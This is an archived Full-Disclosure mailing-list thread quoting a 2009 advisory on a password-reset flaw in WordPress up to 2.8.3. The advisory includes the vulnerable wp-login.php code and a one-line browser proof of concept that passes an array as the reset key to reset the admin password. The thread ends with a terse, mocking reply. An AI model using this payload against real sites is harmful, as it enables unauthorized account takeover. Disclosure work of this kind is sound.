lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 11 Aug 2009 00:54:19 -0400
From: laurent gaffie <laurent.gaffie@...il.com>
To: "Rafal M. Los" <rafal@...ackingyou.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: WordPress <= 2.8.3 Remote admin reset password

"Rafal M. Los
Security & IT Risk Strategist"

where  ?

@home ?
oh boy.



2009/8/11 Rafal M. Los <rafal@...ackingyou.com>

>  Empty reply... on purpose or...?
> .
>
> Rafal
>
>  *From:* laurent gaffie <laurent.gaffie@...il.com>
> *Sent:* Monday, August 10, 2009 11:43 PM
> *To:* Rafal M. Los <rafal@...ackingyou.com>
> *Subject:* Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
>
>
> 2009/8/11 Rafal M. Los <rafal@...ackingyou.com>
>
>>  Hi Laurent,
>>     Pardon my stupidity... I seem to be missing something tonight.  Can
>> you explain a little further for someone who doesn’t have coding (php)
>> background?  What would the "attacker" submit as a query to the server?
>> What specifically triggers the vulnerabiilty?
>> .
>>
>> Rafal M. Los
>> Security & IT Risk Strategist
>>
>>  - Blog:         http://preachsecurity.blogspot.com
>>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>>  - Twitter:     http://twitter.com/RafalLos
>>
>>  *From:* laurent gaffie <laurent.gaffie@...il.com>
>> *Sent:* Monday, August 10, 2009 9:09 PM
>> *To:* full-disclosure@...ts.grok.org.uk
>> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
>> password
>>
>> =============================================
>> - Release date: August 10th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: Medium
>> =============================================
>>
>> I. VULNERABILITY
>> -------------------------
>> WordPress <= 2.8.3 Remote admin reset password
>>
>> II. BACKGROUND
>> -------------------------
>> WordPress is a state-of-the-art publishing platform with a focus on
>> aesthetics, web standards, and usability.
>> WordPress is both free and priceless at the same time.
>> More simply, WordPress is what you use when you want to work with your
>> blogging software, not fight it.
>>
>> III. DESCRIPTION
>> -------------------------
>> The way Wordpress handle a password reset looks like this:
>> You submit your email adress or username via this form
>> /wp-login.php?action=lostpassword ;
>> Wordpress send you a reset confirmation like that via email:
>>
>> "
>> Someone has asked to reset the password for the following site and
>> username.
>> http://DOMAIN_NAME.TLD/wordpress
>> Username: admin
>> To reset your password visit the following address, otherwise just ignore
>> this email and nothing will happen
>>
>>
>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>> "
>>
>> You click on the link, and then Wordpress reset your admin password, and
>> sends you over another email with your new credentials.
>>
>> Let's see how it works:
>>
>>
>> wp-login.php:
>> ...[snip]....
>> line 186:
>> function reset_password($key) {
>>     global $wpdb;
>>
>>     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>
>>     if ( empty( $key ) )
>>         return new WP_Error('invalid_key', __('Invalid key'));
>>
>>     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>> WHERE user_activation_key = %s", $key));
>>     if ( empty( $user ) )
>>         return new WP_Error('invalid_key', __('Invalid key'));
>> ...[snip]....
>> line 276:
>> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
>> $errors = new WP_Error();
>>
>> if ( isset($_GET['key']) )
>>     $action = 'resetpass';
>>
>> // validate action so as to default to the login screen
>> if ( !in_array($action, array('logout', 'lostpassword',
>> 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false ===
>> has_filter('login_form_' . $action) )
>>     $action = 'login';
>> ...[snip]....
>>
>> line 370:
>>
>> break;
>>
>> case 'resetpass' :
>> case 'rp' :
>>     $errors = reset_password($_GET['key']);
>>
>>     if ( ! is_wp_error($errors) ) {
>>         wp_redirect('wp-login.php?checkemail=newpass');
>>         exit();
>>     }
>>
>>     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>     exit();
>>
>> break;
>> ...[snip ]...
>>
>> You can abuse the password reset function, and bypass the first step and
>> then reset the admin password by submiting an array to the $key variable.
>>
>>
>> IV. PROOF OF CONCEPT
>> -------------------------
>> A web browser is sufficiant to reproduce this Proof of concept:
>> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>> The password will be reset without any confirmation.
>>
>> V. BUSINESS IMPACT
>> -------------------------
>> An attacker could exploit this vulnerability to compromise the admin
>> account of any wordpress/wordpress-mu <= 2.8.3
>>
>> VI. SYSTEMS AFFECTED
>> -------------------------
>> All
>>
>> VII. SOLUTION
>> -------------------------
>> No patch aviable for the moment.
>>
>> VIII. REFERENCES
>> -------------------------
>> http://www.wordpress.org
>>
>> IX. CREDITS
>> -------------------------
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>> I'd like to shoot some greetz to securityreason.com for them great
>> research on PHP, as for this under-estimated vulnerability discovered by
>> Maksymilian Arciemowicz :
>> http://securityreason.com/achievement_securityalert/38
>>
>> X. REVISION HISTORY
>> -------------------------
>> August 10th, 2009: Initial release
>>
>> XI. LEGAL NOTICES
>> -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> ------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> follow me @twitter ! : http://twitter.com/laurentgaffie
>



-- 
follow me @twitter ! : http://twitter.com/laurentgaffie

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ